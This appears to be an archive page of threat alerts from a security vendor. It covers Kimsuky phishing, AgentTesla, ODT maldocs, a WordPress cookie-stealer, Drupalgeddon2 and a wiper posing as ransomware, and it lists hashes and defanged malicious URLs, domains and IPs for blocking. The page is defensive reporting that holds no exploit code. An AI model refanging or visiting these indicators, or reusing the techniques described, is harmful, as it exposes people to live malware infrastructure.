Archive for category Threats

Rewterz Threat Alert – Kimsuky Group – IOC’s

Severity

High

Analysis Summary

The Kimsuky group is a threat group that is known to have been behind the KHNP (Korea Hydro & Nuclear Power) cyber terrorism attacks in 2014 and is still active as of 2019. The spear-phishing email used in the attack was designed with the purpose of stealing portal account information and attaching malicious code. The main targets of the attack are government and military officials or reporters.

Impact

  • Credential theft
  • Financial loss

Indicators of Compromise

Malware Hashes:

MD5

  • f22db1e3ea74af791e34ad5aa0297664
  • 4de21c3af64b3b605446278de92dfff4
  • 53ac231e8091abcd0978124f9268b4e4
  • 8b59ea1ee28e0123da82801abc0cce4d

SH256

  • 4f279a55f3658df8206b0b4ca231960a99b51ea3a8a1314a77c3a453ecf5ea2e
  • b40f367c6ec771a7798ec72abff730fb4bba032f18bcc137d572e4119a23f21c

URL

  • http[:]//sariwon[.]co[.]kr/bbs/filter/6EBDB1428052/private64
  • http[:]//sariwon[.]co[.]kr/bbs/filter/6EBDB1428052/secu64_init
  • http[:]//sariwon[.]co[.]kr/bbs/filter/E826DDE74E06/private64
  • http[:]//sariwon[.]co[.]kr/bbs/filter/E826DDE74E06/secu64_init
  • http[:]//www[.]sariwon[.]co[.]kr/bbs/security/scnu/HncCheck[.]zip

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.

Rewterz Threat Alert – Another Agenttesla campaign using a compromised Iraq Government site

Severity

Medium

Analysis Summary

An Agenttesla campaign is observed dropping email attachments that pretend to be a purchase order. The attachment is an ISO file. The C2 / Exfil site is a compromised site belonging to Iraq’s government (mail[.]cosqc[.]gov[.]iq) via smtp because the criminals are using SMTP port 587 and Start TLS which encrypts the email addresses as well as the contents. These malicious attachments yield stealers for passwords as well as bank, PayPal or other financial details along with your email or FTP ( web space) log in credentials.

Impact

  • Keylogging
  • Information Theft
  • Unauthorized Remote Access

Indicators of Compromise

Email Subject

FW: Purchase Order – PO. 4029530

From Email

payment[@]buddiesholidays[.]in

Hostname

mail[.]cosqc[.]gov[.]iq (compromised)

Malware Hashes

MD5

  • 948ab06c3ad8ff56fef7f5d50e647eeb
  • 91d6c671df51ea336208f8cf80ef6283

SH256

  • 3b0b880e65ae7ef1c34e57e3e43d924f78fd6a68ddc694094b6ff0d1621dda1c
  • 8eebcb7d52c969e6bb4704f11022afdf9d61462f96ad27e6859863fa681c77e6

SHA1

  • a2e0db01e3d4b7a1543a09564039a6ca64c183e1
  • 2bfbf256c019413ead6ee3ea0a76200e378d7019

Source IP

  • 108[.]167[.]161[.]64
  • 176[.]28[.]103[.]205
  • 192[.]185[.]10[.]45

Remediation

  • Block the threat indicators at their respective controls.
  • Do not download email attachments coming from untrusted sources.
  • Do not execute untrusted files.

Rewterz Threat Alert – Open Document format creates twist in maldoc landscape

Severity

Medium

Analysis Summary

Cisco Talos recently observed attackers changing the file formats they use in an attempt to thwart common antivirus engines. This can happen across other file formats, but today, we are showing a change of approach for an actor who has deemed antivirus engines perhaps “too good” at detecting macro-based infection vectors. We’ve noticed that the OpenDocument (ODT) file format for some Office applications can be used to bypass these detections. ODT is a ZIP archive with XML-based files used by Microsoft Office, as well as the comparable Apache OpenOffice and LibreOffice software.

Impact

Exposure of sensitive information

Indicator of Compromise

Malware Hash SH256

  • 02000ddf92ceb363760acc1d06b7cd1f05be7a1ca6df68586e77cf65f4c6963e
  • 19027327329e2314b506d9f44b6871f2613b8bb72aa831004e6be873bdb1175d
  • 20919e87d52b1609bc35d939695405212b8ca540e50ce8bece01a9fccfa70169
  • 2f4aa28974486152092669c85d75232098d32446adefeeef3a94ad4c58af0fc8
  • 429d270195bed378495349cf066aee649fd1c8c450530d896844b1692ddddc77
  • 80c62c646cce264c08deb02753f619da82b27d9c727e854904b9b7d88e45bf9e
  • 84cb192cc6416b20293dfb8c621267e1584815a188b67757fa0d1af29a7cfdcd
  • b2b51864fa2f80f8edbdaf6721a6780e15a30291a748c2dfc52d574de0d8c3ed
  • d099eac776eabf48f55a75eb863ad539a546202da02720aa83d88308be3ce4ca
  • de8e85328b1911084455e7dc78b18fd1c6f84366a23eaa273be7fbe4488613dd
  • efb81fb8095319f5ee6fd4d6741b80386a824b9df05460d16d22cad1d6bbb35d
  • f24c6a56273163595197c68abeab7f18e4e2bedd6213892d83cdb7a191ff9900
  • f5194cc197d98ed9078cceca223e294c5ec873b86cbeff92eb9eaca17fc90584
  • f9138756639104e2c392b085cc5a98b1db77f0ed6e3b79eacac9899001ed7116

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.

Rewterz Threat Alert – Cookie Monster Malware Hijacking WordPress Sessions

Severity

Medium

Analysis Summary

A malware attack is observed injecting obfuscated code into a JavaScript file in order to steal web users’ cookies and hijack their WordPress sessions. The malicious script was discovered during an incident response investigation and included the fake, malicious domain “code.wordprssapi[.]com”, where users’ cookie data was sent. Hackers used a typo-squatting strategy to create a domain that looked very similar to that a real, legitimate web service in order to evade detection. However, the properly spelled version of this domain “code.wordpressapi[.]com” is also unrelated to WordPress.

Impact

  • Information Theft
  • Code Execution

Indicators of Compromise

Domain Name

  • abtrcking[.]com
  • upgraderservices[.]cf
  • traffictrade[.]life
  • flipdigital[.]ru
  • stablemoney[.]ru
  • cleantds[.]in
  • dezaula[.]com
  • bwinpoker24[.]com
  • livestats[.]us
  • mediros[.]ru
  • yourmsrp[.]com
  • onlinemarketplace[.]top
  • pipardot[.]com
  • beatchucknorris[.]com
  • adrenalinecdn[.]com
  • blozoo[.]net
  • oasagm82wioi[.]org
  • hosted-oswa[.]org
  • getsocialbuttons[.]xyz
  • trafficapi[.]nl
  • zirve100[.]com
  • nstracking[.]com
  • dcts[.]pw
  • airjss[.]com
  • sbdtds[.]com
  • jquery[.]im
  • ijquery9[.]com
  • upskirt-jp[.]net

Hostname

  • con1[.]sometimesfree[.]biz
  • www[.]caphyon-analytics[.]com
  • src[.]dancewithme[.]biz
  • 1[.]newor[.]net
  • gamescale[.]vio[.]rocks
  • a01[.]u-ad[.]info
  • log[.]widgetstat[.]net
  • 3[.]newor[.]net
  • i[.]omeljs[.]info
  • js2[.]sn00[.]net
  • themes[.]affect[.]lt
  • b[.]nwcdn[.]xyz
  • i[.]rfgdjs[.]info
  • www[.]rarstats[.]com
  • cdn[.]avrti[.]xyz
  • chat-client-js[.]firehoseapp[.]com
  • m[.]free-codes[.]org
  • tag[.]imaginaxs[.]com
  • cdn[.]muse-widgets[.]ru
  • i[.]selectionlinksjs[.]info
  • cdn[.]echoenabled[.]com
  • sdb[.]dancewithme[.]biz
  • earsham[.]pontypriddcrick[.]com
  • c[.]radxcomm[.]com
  • java[.]sometimesfree[.]biz
  • api[.]behavioralmailing[.]com
  • www[.]kanpianjs[.]top
  • cdn[.]jquery[.]tools
  • www[.]seo101[.]net
  • www[.]andrewandjack[.]com
  • webstats[.]xcellenzy[.]com
  • st[.]stadsvc[.]com
  • infinite-2[.]tcs3[.]co[.]uk
  • www[.]yys1982[.]com
  • i3[.]putags[.]com
  • stat[.]botthumb[.]com
  • js[.]sn00[.]net
  • st[.]segpress[.]io
  • m[.]xfanclub[.]ru
  • daljarrock[.]hurlinesswhitchurch[.]com
  • cdn[.]owlcdn[.]com
  • da[.]adsvcs[.]com
  • cfs[.]u-ad[.]info
  • srv1[.]clk-analytics[.]com
  • infinite-3[.]tcs3[.]co[.]uk
  • dup[.]baidustatic[.]pw
  • www[.]spartan-ntv[.]com
  • static[.]bh-cdn[.]com
  • d0[.]histats[.]12mlbe[.]com
  • www[.]ournet-analytics[.]com
  • s1[.]omnitor[.]ru
  • connect[.]f1call[.]com
  • www[.]frompariswithhate[.]org
  • 2[.]api[.]viralheadlines[.]net
  • www[.]agrkings[.]com
  • keit[.]kristofer[.]ga
  • parts[.]kuru2jam[.]com
  • code[.]jguery[.]org
  • widgets[.]wowzio[.]net
  • js[.]nster[.]net
  • script[.]affilizr[.]com
  • cdn[.]inaudium[.]com
  • e[.]e708[.]net
  • narnia[.]tcs3[.]co[.]uk
  • js[.]trafficanalytics[.]online
  • www[.]takoashi[.]net
  • w5983[.]lb[.]wa-track[.]com
  • cdn[.]adpoints[.]media
  • stat[.]rolledwil[.]biz
  • s[.]orange81safe[.]com
  • www[.]hmailserver[.]in

Remediation

  • Block the threat indicators at their respective controls.
  • Do not visit suspicious looking sites.

Rewterz Threat Alert – Attack Campaign Using Drupalgeddon2

Severity

Medium

Analysis Summary

An attack campaign using the Drupalgeddon2 unauthenticated remote code execution vulnerability to execute malicious code and deface websites. In the case analyzed for their blog, Akamai researchers identified a compromised bodysurfing website logging website requests containing code execution attempts. After cleaning up old infections and reducing a web server’s security posture, the code is used to download two files, a GIF image and a TXT file. The GIF image has the appropriate GIF header but is actually used to execute embedded PHP code. The PHP code first performs website defacement and displays a notification of the infection to visitors to the site. Hidden behind this defacement page are functions that allow the attacker to execute various commands via GET or POST requests, such as scanning for local credentials, getting system configurations, and opening a web shell. The TXT file downloaded in the initial infection contains a malicious Perl script. It provides the attacker with denial of service (DoS) and RAT capabilities. For command and control, it leverages an IRC server that has since been taken down. The researchers note that the attack seems to be more opportunistic than targeted.

Impact

  • Denial of service
  • Credential theft
  • Exposure of sensitive information

Indicator of Compromise

IP

91[.]121[.]160[.]194

SH256

e18bf4ddee0b0db77541f3a3ea52d3bbe8fa943dd0ca3f573572fea22533afbe

SHA1

0ef7f63d746c34819d21057bd58b02781777bb29

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.

Rewterz Threat Alert – “Lost Files” Data Wiper Ransomware Getting Paid Without Recovering Files

Severity

High

Analysis Summary

A malicious file masquerading as Windows Security Scanner is being distributed via spam and demands a ransom despite corrupting files and making them unrecoverable. The file is delivered by a link in an email claiming that a virus has been detected on the victim’s computer and they need to run a security scanner. The link leads to the download of a ZIP archive containing the main payload and several additional executable in a hidden folder. The malware attempts to distract the victim with a fake installation progress bar. In the background, files in the Users folder are targeted by the supposed ransomware. However, instead of implementing an encryption algorithm like most ransomware, this malware removes the first line of targeted files. The method used by the ransomware author to do this ends up corrupting any binary files. Because of this, the malware acts more like a wiper than ransomware, so paying the requested ransom will not result in a decryption key capable of recovering files.

Impact

File encryption

Indicators of Compromise

MD5

b594412c00331c12d15d9e18c02a778a

SH256

02629729329cde8d1892afa1d412a75cfcc338826c0b5087a2ef3182b5a1af85

SHA1

697301b4aee6fd89bb655025d772b68ddc2756be

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.

Copyright © Rewterz. All rights reserved.